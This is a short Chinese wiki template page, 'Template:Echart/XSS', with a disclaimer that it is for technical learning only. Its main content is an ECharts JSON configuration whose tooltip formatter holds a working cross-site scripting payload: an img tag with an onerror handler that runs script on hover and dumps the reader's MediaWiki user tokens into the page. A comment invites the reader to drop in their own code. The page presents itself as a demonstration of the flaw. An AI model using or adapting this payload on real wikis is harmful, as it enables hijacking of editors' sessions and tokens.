模板:Echart/XSS
跳至導覽
跳至搜尋
模板文檔 [編輯]
這個文檔是內聯文檔。
- 僅供技術學習與交流使用,禁止使用該頁面所示的應用例進行非法網絡攻擊,違者或將被追究相關責任。
- 返回到模板:Echart
{
"xAxis": {
"type": "category",
"boundaryGap": false,
"data": [
"鼠標指到上面的矩形看看"
]
},
"yAxis": {
"type": "value"
},
"series": [
{
"data": [
1000
],
"type": "bar"
}
],
"tooltip": {
"formatter": "\u003Cimg src='https://example.com/abcd' onerror='/* your code here */ $(\".echart-main\").after(JSON.stringify(mw.user.tokens.values));'\u003E",
"renderMode": "html"
}
}